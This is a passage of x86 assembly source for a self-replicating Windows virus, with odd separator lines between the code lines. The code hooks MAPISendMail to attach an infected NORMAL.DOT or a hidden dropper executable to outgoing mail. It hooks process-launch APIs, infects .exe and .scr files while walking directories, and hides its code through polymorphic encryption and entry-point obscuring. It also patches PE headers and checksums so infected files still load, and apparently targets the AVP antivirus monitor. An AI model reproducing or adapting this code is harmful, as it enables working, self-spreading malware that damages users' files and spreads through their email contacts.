lea ecx, [ebp+(ofs sMAPISendMail-ofs vcode)]
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _GetProcAddress-ofs vcode)]
|
|||
|
mov [esp+(8*4)], eax ;return address=MAPISendMail
|
|||
|
|
|||
|
mov edi, [esp+(12*4)] ;MAPI Struct
|
|||
|
cmp dwo [edi.nFileCount], 0 ;file attached?
|
|||
|
jnz @@3
|
|||
|
inc dwo [edi.nFileCount] ;set 1 attachments
|
|||
|
|
|||
|
lea ebx, [ebp+(ofs MF-ofs vcode)]
|
|||
|
mov [edi.lpFiles], ebx
|
|||
|
sub eax, eax
|
|||
|
mov edi, ebx
|
|||
|
mov ecx, 6
|
|||
|
rep stosd ;esi=file structure
|
|||
|
|
|||
|
call OpenAncev
|
|||
|
jc @@4 ;file dont exists, binary send
|
|||
|
|
|||
|
call GetTemplateDir
|
|||
|
|
|||
|
@@aaa:
|
|||
|
lodsb
|
|||
|
test al, al
|
|||
|
jnz @@aaa
|
|||
|
|
|||
|
call @@aab
|
|||
|
ndot db '\NORMAL.DOT', 0
|
|||
|
@@aab:
|
|||
|
pop edi
|
|||
|
xchg edi, esi
|
|||
|
|
|||
|
dec edi
|
|||
|
@@aac:
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
test al, al ;we'll send infected NORMAL.DOT
|
|||
|
jnz @@aac
|
|||
|
|
|||
|
lea esi, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push 80h
|
|||
|
push esi
|
|||
|
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
|
|||
|
|
|||
|
test eax, eax
|
|||
|
jz @@4 ;file exists?
|
|||
|
|
|||
|
mov eax, esi
|
|||
|
mov edx, 'COD'
|
|||
|
jmp @@5
|
|||
|
@@4:
|
|||
|
|
|||
|
call CreateDropper
|
|||
|
|
|||
|
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
push eax ;buffer
|
|||
|
mov eax, [ebp+(ofs fsizel-ofs vcode)]
|
|||
|
push eax ;size
|
|||
|
lea edi, [ebp+(ofs rbuf-ofs vcode)]
|
|||
|
mov ebx, edi
|
|||
|
call @@111
|
|||
|
shitfile db 'C:\ENIACOC.SYS', 0
|
|||
|
@@111:
|
|||
|
pop esi
|
|||
|
@@111a:
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
test al, al
|
|||
|
jnz @@111a
|
|||
|
push ebx ;name
|
|||
|
|
|||
|
mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h
|
|||
|
call WriteDump ;hidden dump
|
|||
|
|
|||
|
push 00004000h+00008000h
|
|||
|
push 0
|
|||
|
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
call [ebp+(ofs _VirtualFree-ofs vcode)]
|
|||
|
|
|||
|
lea eax, [ebp+(ofs rbuf-ofs vcode)]
|
|||
|
mov edx, 'EXE'
|
|||
|
@@5:
|
|||
|
lea edi, [ebp+(ofs MF-ofs vcode)]
|
|||
|
mov [edi.lpszPathName], eax ;set file to send
|
|||
|
lea esi, [ebp+(ofs rbuf+MAX_PATH-ofs vcode)]
|
|||
|
mov [edi.lpszFileName], esi
|
|||
|
xchg edi, esi
|
|||
|
mov eax, 8
|
|||
|
call random
|
|||
|
inc eax
|
|||
|
inc eax
|
|||
|
inc eax
|
|||
|
mov ecx, eax
|
|||
|
@@a:
|
|||
|
mov eax, 23
|
|||
|
call random
|
|||
|
add al, 'A'
|
|||
|
stosb
|
|||
|
loop @@a
|
|||
|
mov al, '.'
|
|||
|
stosb
|
|||
|
mov eax, edx
|
|||
|
stosd
|
|||
|
@@3:
|
|||
|
mov dwo [ebp+(ofs mm_on_off-ofs vcode)], 0
|
|||
|
popad
|
|||
|
ret
|
|||
|
NewMAPISendMail endp
|
|||
|
|
|||
|
NewCreateProcessA proc
|
|||
|
push esp ;new handler for CreateProcessA
|
|||
|
pushad
|
|||
|
call CheckName
|
|||
|
call delta
|
|||
|
mov eax, [ebp+(ofs _CreateProcessA-ofs vcode)]
|
|||
|
mov [esp+(7*4)+4], eax
|
|||
|
popad
|
|||
|
ret
|
|||
|
NewCreateProcessA endp
|
|||
|
|
|||
|
RestoreChunkz db FALSE
|
|||
|
|
|||
|
NewWinExec proc
|
|||
|
push esp ;new handler for WinExec
|
|||
|
pushad
|
|||
|
call CheckName
|
|||
|
call delta
|
|||
|
mov eax, [ebp+(ofs _WinExec-ofs vcode)]
|
|||
|
mov [esp+(7*4)+4], eax
|
|||
|
popad
|
|||
|
ret
|
|||
|
NewWinExec endp
|
|||
|
|
|||
|
ProcessDir proc
|
|||
|
pushad
|
|||
|
lea edi, [ebp+(ofs directory-ofs vcode)];edi=dir to process
|
|||
|
add edi, eax ;eax=size of dir
|
|||
|
lea esi, [ebp+(ofs FileMask-ofs vcode)]
|
|||
|
movsd
|
|||
|
movsd ;copy *.* mask
|
|||
|
lea eax, [ebp+(ofs find_data-ofs vcode)]
|
|||
|
push eax
|
|||
|
lea eax, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _FindFirstFileA-ofs vcode)]
|
|||
|
inc eax
|
|||
|
jz @@0 ;no file found?
|
|||
|
dec eax
|
|||
|
mov [ebp+(ofs search_handle-ofs vcode)], eax
|
|||
|
@@1:
|
|||
|
pushad
|
|||
|
lea esi, [ebp+(ofs directory-ofs vcode)]
|
|||
|
sub eax, eax
|
|||
|
mov edx, esi
|
|||
|
@@3:
|
|||
|
lodsb
|
|||
|
cmp al, '\' ;search last slash
|
|||
|
jne @@5
|
|||
|
mov edx, esi ;update slash position
|
|||
|
@@5:
|
|||
|
test al, al
|
|||
|
jnz @@3
|
|||
|
lea esi, [ebp+(ofs filename-ofs vcode)]
|
|||
|
mov edi, edx
|
|||
|
@@4:
|
|||
|
lodsb
|
|||
|
cmp al, 'V'
|
|||
|
je @@6
|
|||
|
cmp al, 'v'
|
|||
|
je @@6
|
|||
|
cmp al, '0'
|
|||
|
jb @@4a
|
|||
|
cmp al, '9'
|
|||
|
jbe @@6
|
|||
|
@@4a:
|
|||
|
stosb
|
|||
|
test al, al ;copy name to path
|
|||
|
jnz @@4
|
|||
|
mov eax, dwo [edi-4]
|
|||
|
or eax, 202020h
|
|||
|
not eax
|
|||
|
xor eax, not 'exe'
|
|||
|
jz @@7
|
|||
|
xor eax, ((not 'rcs')xor(not 'exe'))
|
|||
|
jnz @@6 ;tricky, isnt? :)
|
|||
|
@@7:
|
|||
|
call Infect
|
|||
|
@@6: ;process it
|
|||
|
popad
|
|||
|
lea eax, [ebp+(ofs find_data-ofs vcode)]
|
|||
|
push eax
|
|||
|
mov eax, [ebp+(ofs search_handle-ofs vcode)]
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _FindNextFileA-ofs vcode)]
|
|||
|
test eax, eax ;no more files in this dir?
|
|||
|
jne @@1
|
|||
|
@@2:
|
|||
|
push dwo [ebp+(ofs search_handle-ofs vcode)]
|
|||
|
call [ebp+(ofs _FindClose-ofs vcode)] ;close search
|
|||
|
@@0:
|
|||
|
popad
|
|||
|
ret
|
|||
|
ProcessDir endp
|
|||
|
|
|||
|
peh_machine = 4
|
|||
|
peh_nosections = 6
|
|||
|
peh_ntheader = 20
|
|||
|
peh_flags = 22
|
|||
|
peh_initdata = 32
|
|||
|
peh_entrypoint = 40
|
|||
|
peh_imagebase = 52
|
|||
|
peh_imagesize = 80
|
|||
|
peh_chksum = 88
|
|||
|
peh_reloc1 = 160
|
|||
|
peh_reloc2 = 164
|
|||
|
|
|||
|
seh_rvasz = 8
|
|||
|
seh_rva = 12
|
|||
|
seh_rawsz = 16
|
|||
|
seh_raw = 20
|
|||
|
seh_attr = 36
|
|||
|
|
|||
|
Infect proc ;infect PE filez
|
|||
|
mov eax, [ebp+(ofs seed-ofs vcode)]
|
|||
|
mov [ebp+(ofs pseed-ofs vcode)], eax
|
|||
|
mov ecx, DIV_VALUE
|
|||
|
call set_new_eh
|
|||
|
mov esp,[esp+8] ;fix stack
|
|||
|
_remove_seh:
|
|||
|
jmp remove_seh
|
|||
|
db 0EAh
|
|||
|
set_new_eh:
|
|||
|
sub edx, edx
|
|||
|
push dwo fs:[edx]
|
|||
|
mov fs:[edx], esp ;set SEH
|
|||
|
mov by [ebp+(ofs inf?-ofs vcode)], dl
|
|||
|
cmp [ebp+(ofs fsizeh-ofs vcode)], edx
|
|||
|
jne _remove_seh ;too big?
|
|||
|
mov eax, [ebp+(ofs fsizel-ofs vcode)]
|
|||
|
cmp dwo [ebp+(ofs mm_on_off-ofs vcode)], 0
|
|||
|
jnz @@5 ;skip size check for droppers
|
|||
|
test eax, eax
|
|||
|
jz @@5a
|
|||
|
cmp eax, 16*1024
|
|||
|
jbe _remove_seh ;smaller than 16kb?
|
|||
|
@@5:
|
|||
|
div ecx
|
|||
|
test edx, edx ;padded to 101 boundary?
|
|||
|
jz _remove_seh
|
|||
|
@@5a:
|
|||
|
call MapFile ;map file
|
|||
|
mov ecx, eax
|
|||
|
mov ebx, eax
|
|||
|
jecxz _remove_seh ;error mapping
|
|||
|
|
|||
|
mov [ebp+(ofs map@-ofs vcode)], eax
|
|||
|
|
|||
|
cmp wo [ecx], 'ZM' ;EXE file?
|
|||
|
jne @@0
|
|||
|
cmp wo [ecx+18h], 40h
|
|||
|
jne @@0
|
|||
|
mov edi, [ecx+3ch]
|
|||
|
add edi, ecx
|
|||
|
mov [ebp+(ofs pe_header-ofs vcode)], edi
|
|||
|
cmp dwo [edi], 'EP' ;PE EXE file?
|
|||
|
jne @@0
|
|||
|
cmp wo [edi+peh_machine], 014Ch ;i386?
|
|||
|
jne @@0
|
|||
|
movzx eax, wo [edi+peh_flags]
|
|||
|
not al
|
|||
|
test eax, 2002h
|
|||
|
jnz @@0 ;isnt DLL? is executable?
|
|||
|
mov esi, edi
|
|||
|
movzx ecx, wo [edi+peh_nosections]
|
|||
|
cmp ecx, 3
|
|||
|
jb @@0 ;too few sections
|
|||
|
dec ecx
|
|||
|
mov eax, ecx
|
|||
|
shl eax, 3
|
|||
|
shl ecx, 5
|
|||
|
add eax, ecx
|
|||
|
movzx ecx, wo [edi+peh_ntheader]
|
|||
|
add eax, 24
|
|||
|
add eax, ecx ;esi=pe header
|
|||
|
add edi, eax ;edi=section header
|
|||
|
|
|||
|
bt dwo [edi.seh_attr], 6 ;must be init data
|
|||
|
jnc @@0
|
|||
|
|
|||
|
pushad
|
|||
|
mov eax, [esi+peh_entrypoint]
|
|||
|
mov [ebp+(ofs old_eip-ofs vcode)], eax ;copy entrypoint
|
|||
|
mov edi, esi
|
|||
|
movzx ecx, wo [edi+peh_ntheader]
|
|||
|
add ecx, 24
|
|||
|
add edi, ecx ;edi=first section header
|
|||
|
mov eax, [edi+seh_rva]
|
|||
|
mov [ebp+(ofs sRVA-ofs vcode)], eax
|
|||
|
mov eax, [edi+seh_rawsz]
|
|||
|
mov [ebp+(ofs RawSize-ofs vcode)], eax ;set vars for branch_entry
|
|||
|
|
|||
|
mov ecx, [esi+132]
|
|||
|
mov eax, [edi+seh_rva]
|
|||
|
add eax, [edi+seh_rvasz]
|
|||
|
mov ebx, [esi+128]
|
|||
|
sub eax, ebx
|
|||
|
jc @@not_in_1st ;IT start after end of 1st sec
|
|||
|
|
|||
|
cmp ecx, eax
|
|||
|
ja @@set_it
|
|||
|
xchg eax, ecx
|
|||
|
jmp @@set_it
|
|||
|
@@not_in_1st:
|
|||
|
sub ecx, ecx
|
|||
|
@@set_it:
|
|||
|
mov [ebp+(ofs it_size-ofs vcode)], ecx
|
|||
|
|
|||
|
push 00000040h
|
|||
|
push 00002000h+00001000h+00100000h
|
|||
|
push 32*1024
|
|||
|
push 0
|
|||
|
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
|
|||
|
mov [ebp+(ofs buffer2-ofs vcode)], eax
|
|||
|
push 00000040h
|
|||
|
push 00002000h+00001000h+00100000h
|
|||
|
push 32*1024
|
|||
|
push 0
|
|||
|
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
|
|||
|
mov [ebp+(ofs buffer1-ofs vcode)], eax ;alloc 2 bufferz for poly
|
|||
|
mov edi, eax
|
|||
|
mov esi, ebp
|
|||
|
mov ecx, vsize
|
|||
|
rep movsb ;init first buffer
|
|||
|
popad
|
|||
|
|
|||
|
lea eax, [ebp+(ofs kernel-ofs vcode)] ;search in kernel32
|
|||
|
mov [ebp+(ofs dll_name-ofs vcode)], eax
|
|||
|
lea eax, [ebp+(ofs sGetProcAddress-ofs vcode)]
|
|||
|
call SearchIT
|
|||
|
push eax ;push GetProcAdress
|
|||
|
lea eax, [ebp+(ofs sGetModuleHandle-ofs vcode)]
|
|||
|
call SearchIT
|
|||
|
push eax ;push GetModuleHandleA
|
|||
|
lea eax, [ebp+(ofs sCreateProcessA-ofs vcode)]
|
|||
|
call SearchIT
|
|||
|
push eax ;push CreateProcessA
|
|||
|
lea eax, [ebp+(ofs sWinExec-ofs vcode)]
|
|||
|
call SearchIT
|
|||
|
push eax ;push WinExec
|
|||
|
|
|||
|
lea eax, [ebp+(ofs mapi-ofs vcode)] ;search in mapi32
|
|||
|
mov [ebp+(ofs dll_name-ofs vcode)], eax
|
|||
|
lea eax, [ebp+(ofs sMAPISendMail-ofs vcode)]
|
|||
|
call SearchIT
|
|||
|
push eax ;push MAPISendMail
|
|||
|
|
|||
|
sub ecx, ecx
|
|||
|
mov edx, [edi+seh_rva]
|
|||
|
add edx, [edi+seh_rawsz] ;rva+raw size=ep
|
|||
|
mov [ebp+(ofs ep-ofs vcode)], edx
|
|||
|
mov ecx, [esi+peh_imagebase]
|
|||
|
add edx, ecx ;ep+base=delta run
|
|||
|
mov eax, [esi+peh_entrypoint]
|
|||
|
|
|||
|
mov esi, [ebp+(ofs buffer1-ofs vcode)]
|
|||
|
mov edi, [ebp+(ofs buffer2-ofs vcode)]
|
|||
|
|
|||
|
mov [esi+(ofs _delta-ofs vcode)], edx ;set delta in copy
|
|||
|
mov [esi+(ofs _base-ofs vcode)], ecx
|
|||
|
sub eax, [ebp+(ofs ep-ofs vcode)]
|
|||
|
sub eax, 4+(ofs host_entry-ofs vcode)
|
|||
|
mov [esi+(ofs host_entry-ofs vcode)], eax ;set entrypoint in copy
|
|||
|
|
|||
|
pop eax
|
|||
|
mov [esi+(ofs OldMAPISendMail-ofs vcode)], eax
|
|||
|
pop eax
|
|||
|
mov [esi+(ofs OldWinExec-ofs vcode)], eax
|
|||
|
pop eax
|
|||
|
mov [esi+(ofs OldCreateProcessA-ofs vcode)], eax
|
|||
|
pop eax
|
|||
|
mov [esi+(ofs OldGetModuleHandleA-ofs vcode)], eax
|
|||
|
pop eax
|
|||
|
mov [esi+(ofs OldGetProcAddress-ofs vcode)], eax
|
|||
|
|
|||
|
mov by [esi+(ofs RestoreChunkz-ofs vcode)], FALSE
|
|||
|
cmp dwo [ebp+(ofs RawSize-ofs vcode)], MIN_RAW
|
|||
|
jb @@a
|
|||
|
|
|||
|
pushad
|
|||
|
|
|||
|
lea edi, [esi+(ofs rbuf-ofs vcode)] ;start of restoration table
|
|||
|
push edi
|
|||
|
mov ecx, (MAX_BRANCH*(128+4+4))/4
|
|||
|
@@be0:
|
|||
|
call random0 ;fill buffer with garbage
|
|||
|
stosd
|
|||
|
loop @@be0
|
|||
|
|
|||
|
sub eax, eax
|
|||
|
mov [ebp+(ofs reg32-ofs vcode)], eax ;init internal vars
|
|||
|
mov [ebp+(ofs lparm-ofs vcode)], eax
|
|||
|
mov [ebp+(ofs lvars-ofs vcode)], eax
|
|||
|
mov [ebp+(ofs subs_index-ofs vcode)], eax
|
|||
|
mov [ebp+(ofs s_into-ofs vcode)], eax ;allow call
|
|||
|
|
|||
|
mov by [ebp+(ofs recurse-ofs vcode)], MAX_RECURSION-2
|
|||
|
pop edi
|
|||
|
|
|||
|
mov eax, [ebp+(ofs old_eip-ofs vcode)] ;first chunk at
|
|||
|
sub ecx, ecx ;counter
|
|||
|
@@be1:
|
|||
|
inc ecx ;chunk count
|
|||
|
stosd ;starting RVA
|
|||
|
stosd ;(make space for size)
|
|||
|
call virtual2physical_
|
|||
|
or eax, eax
|
|||
|
jz @@fux0red
|
|||
|
mov esi, eax
|
|||
|
add esi, [ebp+(ofs map@-ofs vcode)]
|
|||
|
|
|||
|
push ecx
|
|||
|
mov ecx, 128
|
|||
|
push esi edi
|
|||
|
rep movsb ;copy bytes at chunk
|
|||
|
pop esi edi
|
|||
|
pop ecx
|
|||
|
|
|||
|
lea ebx, [edi-5]
|
|||
|
call crypt_poly
|
|||
|
call garble ;make junk
|
|||
|
call crypt_poly
|
|||
|
mov [esi-4], edi ;(destine
|
|||
|
sub [esi-4], ebx ;- previous destine(b4 junk))
|
|||
|
;==size
|
|||
|
mov al, 0e9h
|
|||
|
stosd
|
|||
|
stosb ;make JMP
|
|||
|
|
|||
|
pushad ;choose a suitable EIP for next
|
|||
|
@@ce0: ;chunk(not overlapping)
|
|||
|
mov eax, [ebp+(ofs RawSize-ofs vcode)]
|
|||
|
sub eax, 12345678h
|
|||
|
it_size equ dwo $-4
|
|||
|
call random
|
|||
|
add eax, [ebp+(ofs sRVA-ofs vcode)] ;eip=rnd(rva)+base
|
|||
|
sub edx, edx
|
|||
|
sub ebx, ebx ;init ok_counter,checked_counter
|
|||
|
lea edi, [ebp+(ofs rbuf-ofs vcode)]
|
|||
|
@@ce1:
|
|||
|
mov esi, [edi]
|
|||
|
add esi, [edi+4] ;entrypoint is above the end(point+sz)
|
|||
|
cmp eax, esi ;last one, so, is valid(for dis entry)
|
|||
|
ja @@ce3
|
|||
|
mov esi, [edi] ;entrypoint is below current one - 129
|
|||
|
sub esi, 129 ;so, it have enought room to grown, ok
|
|||
|
cmp eax, esi
|
|||
|
jnb @@ce2
|
|||
|
@@ce3:
|
|||
|
inc edx ;this one is ok
|
|||
|
@@ce2:
|
|||
|
add edi, [edi+4] ;update pointer to next chunk info
|
|||
|
add edi, 4*2
|
|||
|
inc ebx
|
|||
|
|
|||
|
cmp ecx, ebx ;all entries checked? no, continue
|
|||
|
jne @@ce1
|
|||
|
|
|||
|
cmp ecx, edx ;eip allowed for all our entries?
|
|||
|
jne @@ce0
|
|||
|
|
|||
|
mov [esp+(7*4)], eax ;fix eax(stack)
|
|||
|
popad
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
call virtual2physical_
|
|||
|
add eax, [ebp+(ofs map@-ofs vcode)]
|
|||
|
mov ebx, edi
|
|||
|
sub eax, ebx ;calc distance between chunks
|
|||
|
mov [edi-4], eax ;patch JMP
|
|||
|
lea eax, [edi-4] ;last patcheable jump
|
|||
|
sub eax, [ebp+(ofs map@-ofs vcode)]
|
|||
|
mov [ebp+(ofs patch_jump-ofs vcode)], eax
|
|||
|
mov edi, esi
|
|||
|
add edi, [edi-4] ;edi(table)=edi+2 dwords+junk
|
|||
|
;(cut excess copied bytes)
|
|||
|
pop eax
|
|||
|
cmp ecx, MAX_BRANCH ;process next chunk
|
|||
|
jb @@be1
|
|||
|
popad
|
|||
|
|
|||
|
mov by [esi+(ofs RestoreChunkz-ofs vcode)], TRUE
|
|||
|
|
|||
|
@@a:
|
|||
|
pushad
|
|||
|
mov edi, esi
|
|||
|
mov eax, [ebp+(ofs key1-ofs vcode)]
|
|||
|
mov ecx, (ofs dec_end_code-ofs vcode)/4
|
|||
|
@@loop1:
|
|||
|
xor [edi], eax ;do 2nd loop(internal)
|
|||
|
scasd
|
|||
|
add eax, [ebp+(ofs key2-ofs vcode)]
|
|||
|
loop @@loop1
|
|||
|
popad
|
|||
|
mov eax, (ofs DecriptInit-ofs vcode) ;where our code get control
|
|||
|
mov ecx, vsize
|
|||
|
call mutate ;encript
|
|||
|
mov by [ebp+(ofs inf?-ofs vcode)], -1 ;set continue infecting
|
|||
|
mov [ebp+(ofs polybuffer-ofs vcode)], edi
|
|||
|
add [ebp+(ofs ep-ofs vcode)], eax ;add poly entry to file entry
|
|||
|
cmp ecx, msize ;if poly decriptorz dont fill
|
|||
|
jnb @@3 ;bufferz, make it bufsize long
|
|||
|
mov ecx, msize
|
|||
|
@@3:
|
|||
|
mov [ebp+(ofs tamanho-ofs vcode)], ecx
|
|||
|
@@0:
|
|||
|
call UnmapFile
|
|||
|
@@1:
|
|||
|
movzx eax, by [ebp+(ofs inf?-ofs vcode)]
|
|||
|
or eax, eax
|
|||
|
mov by [ebp+(ofs inf?-ofs vcode)], 0 ;continue processing?
|
|||
|
jz remove_seh
|
|||
|
mov eax, [ebp+(ofs tamanho-ofs vcode)]
|
|||
|
add eax, [ebp+(ofs fsizel-ofs vcode)]
|
|||
|
call AlignD ;round mapsize to infected
|
|||
|
mov [ebp+(ofs fsizel-ofs vcode)], eax ;mark
|
|||
|
call MapFile
|
|||
|
or eax, eax ;error mapping(all is fux0red)
|
|||
|
jz @@1
|
|||
|
mov ebx, eax
|
|||
|
mov [ebp+(ofs map@-ofs vcode)], eax
|
|||
|
add eax, [eax+3ch]
|
|||
|
mov esi, eax
|
|||
|
mov edi, eax
|
|||
|
mov [ebp+(ofs pe_header-ofs vcode)], edi
|
|||
|
movzx ecx, wo [esi+peh_nosections]
|
|||
|
dec ecx
|
|||
|
mov eax, ecx
|
|||
|
shl eax, 3
|
|||
|
shl ecx, 5
|
|||
|
add eax, ecx
|
|||
|
movzx ecx, wo [esi+peh_ntheader]
|
|||
|
add eax, ecx
|
|||
|
sub ecx, ecx ;esi=pe header
|
|||
|
add eax, 24 ;ebx=map base
|
|||
|
add edi, eax ;edi=last section header
|
|||
|
|
|||
|
mov [esi+peh_reloc1], ecx
|
|||
|
mov [esi+peh_reloc2], ecx ;no more relocz
|
|||
|
|
|||
|
push edi esi
|
|||
|
|
|||
|
xchg edi, esi
|
|||
|
mov edi, [esi+seh_raw]
|
|||
|
add edi, [esi+seh_rawsz]
|
|||
|
cmp dwo [ebp+(ofs RawSize-ofs vcode)], MIN_RAW
|
|||
|
jb @@11
|
|||
|
|
|||
|
pushad
|
|||
|
mov edi, [ebp+(ofs patch_jump-ofs vcode)]
|
|||
|
mov eax, edi
|
|||
|
add edi, ebx
|
|||
|
call physical2virtual_ ;get rva of jump immediate
|
|||
|
mov ebx, eax
|
|||
|
mov eax, [ebp+(ofs ep-ofs vcode)]
|
|||
|
sub eax, ebx ;sub it from new eip
|
|||
|
sub eax, 4
|
|||
|
mov [edi], eax ;patch jmp
|
|||
|
popad
|
|||
|
|
|||
|
jmp @@12
|
|||
|
@@11:
|
|||
|
mov eax, [ebp+(ofs ep-ofs vcode)] ;get new eip
|
|||
|
mov esi, [esp]
|
|||
|
mov [esi+peh_entrypoint], eax ;set it in pe header
|
|||
|
@@12:
|
|||
|
add edi, ebx ;edi=raw ofs+raw sz+mbase
|
|||
|
mov esi, [ebp+(ofs polybuffer-ofs vcode)]
|
|||
|
mov edx, [ebp+(ofs tamanho-ofs vcode)]
|
|||
|
mov ecx, edx
|
|||
|
cld
|
|||
|
rep movsb ;zopy vilus codle
|
|||
|
|
|||
|
pop esi edi
|
|||
|
mov [esi+peh_chksum], ecx ;zero checksum
|
|||
|
mov eax, edx
|
|||
|
add eax, [esi+peh_initdata] ;init data size+vsize
|
|||
|
call AlignF
|
|||
|
mov [esi+peh_initdata], eax
|
|||
|
mov [edi+seh_attr], 80000000h+40000000h+00000040h
|
|||
|
|
|||
|
;NT COMPATIBILITY ZONE
|
|||
|
;all to make pe infection NT compliant is here
|
|||
|
;hehe... you also must get the APIs right, of course
|
|||
|
push dwo [ebp+(ofs fsizel-ofs vcode)]
|
|||
|
push ebx
|
|||
|
mov eax, [edi+seh_rawsz]
|
|||
|
mov ebx, [edi+seh_rvasz]
|
|||
|
; mov edx, [ebp+(ofs tamanho-ofs vcode)]
|
|||
|
add eax, edx
|
|||
|
add ebx, edx ;increase raw/virtual size
|
|||
|
call AlignF
|
|||
|
mov [edi+seh_rawsz], eax ;save aligned raw size
|
|||
|
xchg eax, ebx
|
|||
|
call AlignO ;align virtual size
|
|||
|
cmp eax, ebx
|
|||
|
jnb @@4 ;is below raw size?
|
|||
|
mov eax, ebx
|
|||
|
call AlignO ;then use raw size, realigned
|
|||
|
@@4:
|
|||
|
mov [edi+seh_rvasz], eax ;save aligned virtual size
|
|||
|
mov eax, [edi+seh_rvasz] ;calculate last memory occuped
|
|||
|
add eax, [edi+seh_rva]
|
|||
|
call AlignO ;align
|
|||
|
cmp eax, [esi+peh_imagesize] ;is bigger than previous one?
|
|||
|
jb @@aa
|
|||
|
mov [esi+peh_imagesize], eax ;if so, fix imagesize
|
|||
|
@@aa:
|
|||
|
|
|||
|
call ChecksumMappedFile
|
|||
|
mov [esi+peh_chksum], eax
|
|||
|
|
|||
|
push 00004000h+00008000h
|
|||
|
push 0
|
|||
|
push dwo [ebp+(ofs buffer1-ofs vcode)]
|
|||
|
call [ebp+(ofs _VirtualFree-ofs vcode)]
|
|||
|
push 00004000h+00008000h
|
|||
|
push 0
|
|||
|
push dwo [ebp+(ofs buffer2-ofs vcode)]
|
|||
|
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free bufferz
|
|||
|
mov by [ebp+(ofs inf?-ofs vcode)], 0
|
|||
|
jmp @@0
|
|||
|
|
|||
|
@@fux0red:
|
|||
|
popad
|
|||
|
jmp @@a
|
|||
|
|
|||
|
wavp db 'AVP Monitor',0 ;inserted in middle of code ;)
|
|||
|
|
|||
|
remove_seh:
|
|||
|
sub edx, edx
|
|||
|
pop dwo fs:[edx] ;remove frame
|
|||
|
pop edx
|
|||
|
ret
|
|||
|
Infect endp
|
|||
|
|
|||
|
AlignD proc
|
|||
|
push ebp edx
|
|||
|
mov ebp, DIV_VALUE
|
|||
|
jmp _align
|
|||
|
AlignD endp
|
|||
|
|
|||
|
AlignO proc
|
|||
|
push ebp edx
|
|||
|
mov ebp, [esi+56]
|
|||
|
jmp _align
|
|||
|
AlignO endp
|
|||
|
|
|||
|
AlignF proc
|
|||
|
push ebp edx
|
|||
|
mov ebp, [esi+60]
|
|||
|
_align:
|
|||
|
sub edx, edx
|
|||
|
div ebp
|
|||
|
test edx, edx
|
|||
|
jz @@1
|
|||
|
inc eax
|
|||
|
sub edx, edx
|
|||
|
@@1:
|
|||
|
mul ebp
|
|||
|
pop edx ebp
|
|||
|
ret
|
|||
|
AlignF endp
|
|||
|
|
|||
|
WriteMem proc
|
|||
|
push 0 ;result
|
|||
|
push ecx ;size
|
|||
|
push esi ;buffer from
|
|||
|
push edi ;where write
|
|||
|
call [ebp+(ofs _GetCurrentProcess-ofs vcode)]
|
|||
|
push eax ;handle to process
|
|||
|
call [ebp+(ofs _WriteProcessMemory-ofs vcode)]
|
|||
|
ret
|
|||
|
WriteMem endp
|
|||
|
|
|||
|
cp_key db 0
|
|||
|
|
|||
|
GetList proc
|
|||
|
lea edi, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push MAX_PATH
|
|||
|
push edi
|
|||
|
call [ebp+(ofs _GetSystemDirectoryA-ofs vcode)]
|
|||
|
lea edi, [edi+eax]
|
|||
|
call @@1
|
|||
|
db '\BRSCBC.DAT', 0
|
|||
|
@@1:
|
|||
|
pop esi
|
|||
|
@@2:
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
test al, al
|
|||
|
jnz @@2
|
|||
|
ret
|
|||
|
GetList endp
|
|||
|
|
|||
|
CheckList proc
|
|||
|
push eax
|
|||
|
call GetList
|
|||
|
mov dwo [ebp+(ofs fsizel-ofs vcode)], 1*4
|
|||
|
inc by [ebp+(ofs mf_mode-ofs vcode)]
|
|||
|
inc by [ebp+(ofs mf_mode1-ofs vcode)]
|
|||
|
call MapFile
|
|||
|
mov [ebp+(ofs map@-ofs vcode)], eax
|
|||
|
dec by [ebp+(ofs mf_mode-ofs vcode)]
|
|||
|
dec by [ebp+(ofs mf_mode1-ofs vcode)]
|
|||
|
mov edi, eax
|
|||
|
test eax, eax
|
|||
|
pop eax
|
|||
|
jz @@1
|
|||
|
mov ecx, [ebp+(ofs fsizel-ofs vcode)]
|
|||
|
shr ecx, 2
|
|||
|
repne scasd
|
|||
|
push ecx
|
|||
|
call UnmapFile
|
|||
|
pop eax
|
|||
|
@@1:
|
|||
|
ret
|
|||
|
CheckList endp
|
|||
|
|
|||
|
InsertList proc
|
|||
|
call GetList
|
|||
|
sub eax, eax
|
|||
|
push eax
|
|||
|
push 80h
|
|||
|
push 3
|
|||
|
push eax eax
|
|||
|
push 0c0000000h ;read/write
|
|||
|
lea eax, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _CreateFileA-ofs vcode)]
|
|||
|
inc eax
|
|||
|
jz @@1
|
|||
|
dec eax
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
sub ecx, ecx
|
|||
|
push 2
|
|||
|
push ecx
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _SetFilePointer-ofs vcode)]
|
|||
|
|
|||
|
mov eax, [esp]
|
|||
|
|
|||
|
push 0
|
|||
|
call @@2
|
|||
|
dd 0
|
|||
|
@@2:
|
|||
|
push 4
|
|||
|
lea ecx, [ebp+(ofs email_crc-ofs vcode)]
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _WriteFile-ofs vcode)]
|
|||
|
|
|||
|
call [ebp+(ofs _CloseHandle-ofs vcode)]
|
|||
|
|
|||
|
@@1:
|
|||
|
ret
|
|||
|
InsertList endp
|
|||
|
|
|||
|
ChecksumMappedFile proc
|
|||
|
push ebp
|
|||
|
mov ebp, esp
|
|||
|
push esi
|
|||
|
push ecx
|
|||
|
push edx
|
|||
|
xor edx, edx
|
|||
|
mov esi, [ebp+8]
|
|||
